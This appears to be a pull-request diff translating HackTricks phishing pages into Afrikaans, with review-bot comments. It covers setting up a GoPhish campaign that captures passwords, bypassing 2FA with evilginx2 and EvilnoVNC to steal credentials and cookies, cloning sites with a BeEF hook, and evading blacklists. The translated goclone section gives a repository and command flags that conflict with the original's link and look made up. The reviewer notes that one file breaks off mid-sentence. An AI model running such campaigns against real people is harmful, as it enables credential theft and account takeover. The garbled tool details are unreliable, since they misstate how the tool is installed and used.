You can request your domain/IP to be removed at [https://sender.office.com/](https://sender.office.com).
|
||||
## Skep & Lanseer GoPhish-veldtog
|
||||
|
||||
## Create & Launch GoPhish Campaign
|
||||
### Verstuurprofiel
|
||||
|
||||
### Sending Profile
|
||||
|
||||
* Set some **name to identify** the sender profile
|
||||
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
|
||||
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
|
||||
* Stel 'n **naam in om** die verstuurprofiel te identifiseer
|
||||
* Besluit van watter rekening jy die phising-e-posse gaan stuur. Voorstelle: _noreply, support, servicedesk, salesforce..._
|
||||
* Jy kan die gebruikersnaam en wagwoord leeg laat, maar maak seker om die "Ignore Certificate Errors" te merk
|
||||
|
||||
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (17).png>)
|
||||
|
||||
{% hint style="info" %}
|
||||
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\
|
||||
I would recommend to **send the test emails to 10min mails addresses** in order to avoid getting blacklisted making tests.
|
||||
Dit word aanbeveel om die "**Send Test Email**" funksionaliteit te gebruik om te toets of alles werk.\
|
||||
Ek sal aanbeveel om die toets-e-posse na 10min-posadressse te stuur om te voorkom dat jy op die swartlys beland terwyl jy toetse doen.
|
||||
{% endhint %}
|
||||
|
||||
### Email Template
|
||||
|
||||
* Set some **name to identify** the template
|
||||
* Then write a **subject** (nothing estrange, just something you could expect to read in a regular email)
|
||||
* Make sure you have checked "**Add Tracking Image**"
|
||||
* Write the **email template** (you can use variables like in the following example):
|
||||
### E-pos-sjabloon
|
||||
|
||||
* Stel 'n **naam in om** die sjabloon te identifiseer
|
||||
* Skryf dan 'n **onderwerp** (niks vreemds nie, net iets wat jy in 'n gewone e-pos sou verwag om te lees)
|
||||
* Maak seker dat jy "**Add Tracking Image**" gemerk het
|
||||
* Skryf die **e-pos-sjabloon** (jy kan veranderlikes gebruik soos in die volgende voorbeeld):
|
||||
```markup
|
||||
<html>
|
||||
<head>
|
||||
<title></title>
|
||||
<title></title>
|
||||
</head>
|
||||
<body>
|
||||
<p class="MsoNormal"><span style="font-size:10.0pt;font-family:"Verdana",sans-serif;color:black">Dear {{.FirstName}} {{.LastName}},</span></p>
|
||||
|
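Review bot: the heading `### Verwydering van Spamhouse Blacklist` and the sentence `of jou domein deur Spamhouse geblokkeer word` preserve a misspelling from the English source; the service linked on the same line is Spamhaus (`https://www.spamhaus.org/lookup/`), so spell it that way in both versions. Typo in the sending-profile hint: `10min-posadressse` has an extra `s`. Keeping the GoPhish checkbox label `"Ignore Certificate Errors"` in English is the right call, because that is the text the reader has to find in the GoPhish form; apply the same rule to the other UI labels further down.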
@ -372,127 +348,101 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY
|
|||
</body>
|
||||
</html>
|
||||
```
|
||||
Let daarop dat **om die geloofwaardigheid van die e-pos te verhoog**, dit aanbeveel word om 'n handtekening van 'n e-pos van die kliënt te gebruik. Voorstelle:
|
||||
|
||||
Note that **in order to increase the credibility of the email**, it's recommended to use some signature from an email from the client. Suggestions:
|
||||
|
||||
* Send an email to a **non existent address** and check if the response has any signature.
|
||||
* Search for **public emails** like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response.
|
||||
* Try to contact **some valid discovered** email and wait for the response
|
||||
* Stuur 'n e-pos na 'n **nie-bestaande adres** en kyk of die reaksie enige handtekening het.
|
||||
* Soek na **openbare e-posse** soos info@ex.com of press@ex.com of public@ex.com en stuur hulle 'n e-pos en wag vir die reaksie.
|
||||
* Probeer om **'n geldige ontdekte** e-pos te kontak en wag vir die reaksie.
|
||||
|
||||
![](<../../.gitbook/assets/image (393).png>)
|
||||
|
||||
{% hint style="info" %}
|
||||
The Email Template also allows to **attach files to send**. If you would also like to steal NTLM challenges using some specially crafted files/documents [read this page](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md).
|
||||
Die E-pos Templaat maak dit ook moontlik om **lêers aan te heg om te stuur**. As jy ook NTLM-uitdagings wil steel deur van spesiaal vervaardigde lêers/dokumente gebruik te maak, [lees hierdie bladsy](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md).
|
||||
{% endhint %}
|
||||
|
||||
### Landing Page
|
||||
### Landingsbladsy
|
||||
|
||||
* Write a **name**
|
||||
* **Write the HTML code** of the web page. Note that you can **import** web pages.
|
||||
* Mark **Capture Submitted Data** and **Capture Passwords**
|
||||
* Set a **redirection**
|
||||
* Skryf 'n **naam**
|
||||
* **Skryf die HTML-kode** van die webbladsy. Let daarop dat jy webbladsye kan **importe**.
|
||||
* Merk **Vasgevang Data** en **Vasgevang Wagwoorde**
|
||||
* Stel 'n **omleiding** in
|
||||
|
||||
![](<../../.gitbook/assets/image (394).png>)
|
||||
|
||||
{% hint style="info" %}
|
||||
Usually you will need to modify the HTML code of the page and make some tests in local (maybe using some Apache server) **until you like the results.** Then, write that HTML code in the box.\
|
||||
Note that if you need to **use some static resources** for the HTML (maybe some CSS and JS pages) you can save them in _**/opt/gophish/static/endpoint**_ and then access them from _**/static/\<filename>**_
|
||||
Gewoonlik sal jy die HTML-kode van die bladsy moet wysig en 'n paar toetse plaaslik doen (dalk deur van 'n Apache-bediener gebruik te maak) **tot jy tevrede is met die resultate**. Skryf dan daardie HTML-kode in die blokkie.\
|
||||
Let daarop dat as jy **van statiese hulpbronne** vir die HTML gebruik (dalk van CSS- en JS-bladsye), jy hulle kan stoor in _**/opt/gophish/static/endpoint**_ en dan daarna toegang daartoe kan verkry vanaf _**/static/\<lêernaam>**_
|
||||
{% endhint %}
|
||||
|
||||
{% hint style="info" %}
|
||||
For the redirection you could **redirect the users to the legit main web page** of the victim, or redirect them to _/static/migration.html_ for example, put some **spinning wheel (**[**https://loading.io/**](https://loading.io)**) for 5 seconds and then indicate that the process was successful**.
|
||||
Vir die omleiding kan jy die gebruikers **omlei na die regmatige hoofwebbladsy** van die slagoffer, of hulle omlei na _/static/migration.html_ byvoorbeeld, 'n **draaiwiel** ([**https://loading.io/**](https://loading.io)) vir 5 sekondes plaas en dan aandui dat die proses suksesvol was.
|
||||
{% endhint %}
|
||||
|
||||
### Users & Groups
|
||||
### Gebruikers & Groepe
|
||||
|
||||
* Set a name
|
||||
* **Import the data** (note that in order to use the template for the example you need the firstname, last name and email address of each user)
|
||||
* Stel 'n naam in
|
||||
* **Importeer die data** (let daarop dat jy die voornaam, van en e-posadres van elke gebruiker nodig het om die templaat vir die voorbeeld te gebruik)
|
||||
|
||||
![](<../../.gitbook/assets/image (395).png>)
|
||||
|
||||
### Campaign
|
||||
### Veldtog
|
||||
|
||||
Finally, create a campaign selecting a name, the email template, the landing page, the URL, the sending profile and the group. Note that the URL will be the link sent to the victims
|
||||
Skep uiteindelik 'n veldtog deur 'n naam, die e-pos templaat, die landingsbladsy, die URL, die stuurprofiel en die groep te kies. Let daarop dat die URL die skakel is wat na die slagoffers gestuur word.
|
||||
|
||||
Note that the **Sending Profile allow to send a test email to see how will the final phishing email looks like**:
|
||||
Let daarop dat die **Stuurprofiel toelaat om 'n toets-e-pos te stuur om te sien hoe die uiteindelike phising-e-pos lyk**:
|
||||
|
||||
![](<../../.gitbook/assets/image (396).png>)
|
||||
|
||||
{% hint style="info" %}
|
||||
I would recommend to **send the test emails to 10min mails addresses** in order to avoid getting blacklisted making tests.
|
||||
Ek sal aanbeveel om die toets-e-posse na 10min-e-posadresse te stuur om te verhoed dat jy deur toetse op 'n swartlys geplaas word.
|
||||
{% endhint %}
|
||||
|
||||
Once everything is ready, just launch the campaign!
|
||||
Sodra alles gereed is, begin die veldtog!
|
||||
|
||||
## Website Cloning
|
||||
## Webwerfkloning
|
||||
|
||||
If for any reason you want to clone the website check the following page:
|
||||
As jy om enige rede die webwerf wil kloon, kyk na die volgende bladsy:
|
||||
|
||||
{% content-ref url="clone-a-website.md" %}
|
||||
[clone-a-website.md](clone-a-website.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Backdoored Documents & Files
|
||||
## Terugdeur-dokumente & -lêers
|
||||
|
||||
In some phishing assessments (mainly for Red Teams) you will want to also **send files containing some kind of backdoor** (maybe a C2 or maybe just something that will trigger an authentication).\
|
||||
Check out the following page for some examples:
|
||||
In sommige phising-assesserings (veral vir Rooi Spanne) wil jy ook **lêers stuur wat 'n sekere soort terugdeur bevat** (dalk 'n C2 of dalk net iets wat 'n outentifikasie sal inisieer).\
|
||||
Kyk na die volgende bladsy vir voorbeelde:
|
||||
|
||||
{% content-ref url="phishing-documents.md" %}
|
||||
[phishing-documents.md](phishing-documents.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Phishing MFA
|
||||
## Phising MFA
|
||||
|
||||
### Via Proxy MitM
|
||||
|
||||
The previous attack is pretty clever as you are faking a real website and gathering the information set by the user. Unfortunately, if the user didn't put the correct password or if the application you faked is configured with 2FA, **this information won't allow you to impersonate the tricked user**.
|
||||
Die vorige aanval is redelik slim omdat jy 'n regte webwerf naboots en die inligting wat deur die gebruiker ingevoer is, versamel. Ongelukkig, as die gebruiker nie die korrekte wagwoord ingevoer het nie of as die toepassing wat jy nageboots het, met 2FA gekonfigureer is, **sal hierdie inligting jou nie in staat stel om die bedriegde gebruiker na te boots nie**.
|
||||
|
||||
This is where tools like [**evilginx2**](https://github.com/kgretzky/evilginx2)**,** [**CredSniper**](https://github.com/ustayready/CredSniper) and [**muraena**](https://github.com/muraenateam/muraena) are useful. This tool will allow you to generate a MitM like attack. Basically, the attacks works in the following way:
|
||||
Dit is waar hulpmiddels soos [**evilginx2**](https://github.com/kgretzky/evilginx2)**,** [**CredSniper**](https://github.com/ustayready/CredSniper) en [**muraena**](https://github.com/muraenateam/muraena) nuttig is. Hierdie hulpmiddel sal jou in staat stel om 'n MitM-soort aanval te genereer. Die aanval werk basies soos volg:
|
||||
|
||||
1. You **impersonate the login** form of the real webpage.
|
||||
2. The user **send** his **credentials** to your fake page and the tool send those to the real webpage, **checking if the credentials work**.
|
||||
3. If the account is configured with **2FA**, the MitM page will ask for it and once the **user introduces** it the tool will send it to the real web page.
|
||||
4. Once the user is authenticated you (as attacker) will have **captured the credentials, the 2FA, the cookie and any information** of every interaction your while the tool is performing a MitM.
|
||||
1. Jy **boots die aanmeldingsvorm** van die regte webbladsy na.
|
||||
2. Die gebruiker **stuur** sy **inskrywings** na jou valse bladsy en die hulpmiddel stuur dit na die regte webbladsy, **deur te kyk of die inligting werk**.
|
||||
3. As die rekening met **2FA** gekonfigureer is, sal die MitM-bladsy daarvoor vra en sodra die **gebruiker dit invoer**, sal die hulpmiddel dit na die regte webbladsy stuur.
|
||||
4. Sodra die gebruiker geïdentifiseer is, sal jy (as aanvaller) die **inskrywings, die 2FA, die koekie en enige inligting** van elke interaksie wat jy tydens die MitM-uitvoer van die hulpmiddel uitvoer, **vasgevang het**.
|
||||
|
||||
### Via VNC
|
||||
|
||||
What if instead of **sending the victim to a malicious page** with the same looks as the original one, you send him to a **VNC session with a browser connected to the real web page**? You will be able to see what he does, steal the password, the MFA used, the cookies...\
|
||||
You can do this with [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC)
|
||||
Wat as jy die slagoffer in plaas daarvan **na 'n skadelike bladsy stuur** met dieselfde voorkoms as die oorspronklike een, hom na 'n **VNC-sessie met 'n blaaier wat aan die regte webbladsy gekoppel is**, stuur? Jy sal kan sien wat hy doen, die wagwoord steel, die gebruikte MFA, die koekies...\
|
||||
Jy kan dit doen met [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC)
|
||||
|
||||
## Detecting the detection
|
||||
## Die opsporing van die opsporing
|
||||
|
||||
Obviously one of the best ways to know if you have been busted is to **search your domain inside blacklists**. If it appears listed, somehow your domain was detected as suspicions.\
|
||||
One easy way to check if you domain appears in any blacklist is to use [https://malwareworld.com/](https://malwareworld.com)
|
||||
Dit is vanselfsprekend een van die beste maniere om te weet of jy gevang is, is om jou domein in swartlyste te soek. As dit gelys word, is jou domein op een of ander manier as verdag geïdentifiseer.\
|
||||
Een maklike manier om te kyk of jou domein op enige swartlys verskyn, is deur [https://malwareworld.com/](https://malwareworld.com) te gebruik
|
||||
|
||||
However, there are other ways to know if the victim is **actively looking for suspicions phishing activity in the wild** as explained in:
|
||||
Daar is egter ander maniere om te weet of die slagoffer **aktief op soek is na verdagte phising-aktiwiteit in die wildernis**, soos verduidelik in:
|
||||
|
||||
{% content-ref url="detecting-phising.md" %}
|
||||
[detecting-phising.md](detecting-phising.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
You can **buy a domain with a very similar name** to the victims domain **and/or generate a certificate** for a **subdomain** of a domain controlled by you **containing** the **keyword** of the victim's domain. If the **victim** perform any kind of **DNS or HTTP interaction** with them, you will know that **he is actively looking** for suspicious domains and you will need to be very stealth.
|
||||
|
||||
### Evaluate the phishing
|
||||
|
||||
Use [**Phishious** ](https://github.com/Rices/Phishious)to evaluate if your email is going to end in the spam folder or if it's going to be blocked or successful.
|
||||
|
||||
## References
|
||||
|
||||
* [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
|
||||
* [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/)
|
||||
* [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/)
|
||||
* [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
Jy kan 'n domein **koop met 'n baie soortgelyke naam** as die slagoffer se domein **en/of 'n sertifikaat genereer** vir 'n **subdomein** van 'n domein wat deur jou beheer word **wat die sleutelwoord** van die slagoffer
|
||||
|
|
|
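Review bot: the translated file is truncated. Its new final line `Jy kan 'n domein koop met 'n baie soortgelyke naam ... wat die sleutelwoord van die slagoffer` stops mid-sentence, and the removed English lines that follow it (`### Evaluate the phishing` with the Phishious link, `## References` with its four URLs, and the closing `<details>` footer) have no Afrikaans counterpart, so the merged page would lose its references and end on a half sentence. Restore the rest of that paragraph and the missing sections before merging. Two smaller points: the landing-page bullets translate the GoPhish checkbox names to `Vasgevang Data` and `Vasgevang Wagwoorde`, whereas `Send Test Email` and `Add Tracking Image` were correctly left in English; keep `Capture Submitted Data` and `Capture Passwords` verbatim so readers can locate them in the UI. In the proxy MitM list, step 4 renders `Once the user is authenticated` as `Sodra die gebruiker geïdentifiseer is`, which changes the meaning from authenticated to identified; `geoutentiseer` is the term the surrounding text needs.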
@ -1,59 +1,88 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
For a phishing assessment sometimes it might be useful to completely **clone a website**.
|
||||
Vir 'n phising-assessering kan dit soms nuttig wees om 'n webwerf heeltemal te **kloneer**.
|
||||
|
||||
Note that you can add also some payloads to the cloned website like a BeEF hook to "control" the tab of the user.
|
||||
Let daarop dat jy ook sekere ladinge by die gekloonde webwerf kan voeg, soos 'n BeEF-haak om die tabblad van die gebruiker te "beheer".
|
||||
|
||||
There are different tools you can use for this purpose:
|
||||
Daar is verskillende gereedskap wat jy vir hierdie doel kan gebruik:
|
||||
|
||||
## wget
|
||||
|
||||
```text
|
||||
wget -mk -nH
|
||||
```
|
||||
## gokloon
|
||||
|
||||
## goclone
|
||||
Hierdie hulpmiddel word gebruik om 'n webwerf te kloon en 'n identiese kopie daarvan te skep. Dit kan gebruik word vir phising-aanvalle waar 'n aanvaller 'n nagemaakte weergawe van 'n legitieme webwerf skep om gebruikers se inligting te bekom.
|
||||
|
||||
### Gebruik
|
||||
|
||||
1. Installeer die `goclone`-hulpmiddel deur die opdrag `go get github.com/muhammadmuzzammil1998/goclone` uit te voer.
|
||||
2. Voer die opdrag `goclone -url <URL> -output <UITSET>` uit, waar `<URL>` die URL van die te kloon webwerf is en `<UITSET>` die uitsetgids is waarin die gekloonde webwerf gestoor moet word.
|
||||
3. Die hulpmiddel sal die webwerf kloon en al die nodige lêers en bronne in die opgegeven uitsetgids stoor.
|
||||
|
||||
### Voorbeelde
|
||||
|
||||
- Kloon 'n webwerf en stoor dit in die huidige gids:
|
||||
```
|
||||
goclone -url https://www.example.com -output .
|
||||
```
|
||||
|
||||
- Kloon 'n webwerf en stoor dit in 'n spesifieke gids:
|
||||
```
|
||||
goclone -url https://www.example.com -output /path/to/output
|
||||
```
|
||||
|
||||
### Waarskuwing
|
||||
|
||||
Dit is belangrik om te onthou dat die kloning van 'n webwerf sonder toestemming van die eienaar onwettig is. Hierdie hulpmiddel moet slegs gebruik word vir wettige doeleindes, soos toegelaat deur die wet.
|
||||
```bash
|
||||
#https://github.com/imthaghost/goclone
|
||||
goclone <url>
|
||||
```
|
||||
## Sosiale Ingenieurswese Gereedskapskis
|
||||
|
||||
## Social Engineering Toolit
|
||||
### Kloon 'n Webwerf
|
||||
|
||||
Hierdie metode behels die kloning van 'n bestaande webwerf om gebruikers se inligting te verkry deur middel van sosiale ingenieurswese. Hier is die stappe wat gevolg kan word om 'n webwerf te kloon:
|
||||
|
||||
1. Identifiseer die teikenwebwerf wat jy wil kloon.
|
||||
2. Skep 'n nuwe webwerf of subdomein wat soortgelyk is aan die teikenwebwerf.
|
||||
3. Kry toegang tot die bronkode van die teikenwebwerf.
|
||||
4. Analiseer die bronkode om die struktuur en funksionaliteit van die webwerf te verstaan.
|
||||
5. Skep 'n kopie van die webwerf se ontwerp en inhoud.
|
||||
6. Pas die gekloonde webwerf aan om dit soortgelyk aan die teikenwebwerf te maak.
|
||||
7. Stel 'n valse aanmeldingsbladsy op wat gebruikers se inligting sal onderskep.
|
||||
8. Stuur 'n phising-e-pos na die teikengebruikers om hulle na die gekloonde webwerf te lok.
|
||||
9. Monitor die gekloonde webwerf vir inkomende aanmeldingsinligting.
|
||||
10. Onttrek die verkrygde inligting en gebruik dit vir verdere aanvalle of identiteitsdiefstal.
|
||||
|
||||
Dit is belangrik om te onthou dat die kloning van 'n webwerf sonder toestemming onwettig is en ernstige gevolge kan hê. Hierdie metode moet slegs gebruik word vir wettige doeleindes, soos om bewusmaking oor sosiale ingenieurswese te skep of om sekuriteitslekke in 'n webwerf te identifiseer.
|
||||
```bash
|
||||
#https://github.com/trustedsec/social-engineer-toolkit
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
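Review bot: the shared footer is translated inconsistently across the files in this commit; here the last list item reads `* **Deel jou hacking-truuks deur PR's in te dien by die** ... github-opslagplekke.` while the same boilerplate becomes `hacktruuks` / `github-repos` and `github-opslag` in the other translated footers. Since this block is copied verbatim into every page, settle on one rendering (e.g. `hacktruuks` and `GitHub-repos`) and reuse it so the footers stay identical. The `SUBSCRIPTION PLANS` link text being left in English is fine, it is a proper name for the sponsor page.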
@ -1,95 +1,92 @@
|
|||
# Detecting Phising
|
||||
# Op die spoor van Phishing
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Introduction
|
||||
## Inleiding
|
||||
|
||||
To detect a phishing attempt it's important to **understand the phishing techniques that are being used nowadays**. On the parent page of this post, you can find this information, so if you aren't aware of which techniques are being used today I recommend you to go to the parent page and read at least that section.
|
||||
Om 'n phising-poging op te spoor, is dit belangrik om **die phising-tegnieke wat tans gebruik word, te verstaan**. Op die ouerbladsy van hierdie pos kan jy hierdie inligting vind, so as jy nie bewus is van watter tegnieke vandag gebruik word nie, sal ek aanbeveel dat jy na die ouerbladsy gaan en ten minste daardie afdeling lees.
|
||||
|
||||
This post is based on the idea that the **attackers will try to somehow mimic or use the victim's domain name**. If your domain is called `example.com` and you are phished using a completely different domain name for some reason like `youwonthelottery.com`, these techniques aren't going to uncover it.
|
||||
Hierdie pos is gebaseer op die idee dat die **aanvallers op een of ander manier die domeinnaam van die slagoffer sal probeer naboots of gebruik**. As jou domein `example.com` genoem word en jy ge-phish word deur 'n heeltemal ander domeinnaam vir 'n rede soos `youwonthelottery.com`, sal hierdie tegnieke dit nie ontbloot nie.
|
||||
|
||||
## Domain name variations
|
||||
## Variasies van domeinname
|
||||
|
||||
It's kind of **easy** to **uncover** those **phishing** attempts that will use a **similar domain** name inside the email.\
|
||||
It's enough to **generate a list of the most probable phishing names** that an attacker may use and **check** if it's **registered** or just check if there is any **IP** using it.
|
||||
Dit is redelik **maklik** om daardie **phising-pogings** wat 'n **soortgelyke domeinnaam** binne die e-pos gebruik, **te ontbloot**.\
|
||||
Dit is genoeg om 'n lys van die mees waarskynlike phisingname te **genereer** wat 'n aanvaller kan gebruik en te **kyk** of dit **geregistreer** is of net te kyk of daar enige **IP** is wat dit gebruik.
|
||||
|
||||
### Finding suspicious domains
|
||||
### Verdagte domeine vind
|
||||
|
||||
For this purpose, you can use any of the following tools. Note that these tolls will also perform DNS requests automatically to check if the domain has any IP assigned to it:
|
||||
Vir hierdie doel kan jy enige van die volgende hulpmiddels gebruik. Let daarop dat hierdie hulpmiddels outomaties DNS-versoeke sal doen om te kyk of die domein 'n IP daaraan toegewys het:
|
||||
|
||||
* [**dnstwist**](https://github.com/elceef/dnstwist)
|
||||
* [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy)
|
||||
|
||||
### Bitflipping
|
||||
|
||||
**You can find a short the explanation of this technique in the parent page. Or read the original research in [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)**
|
||||
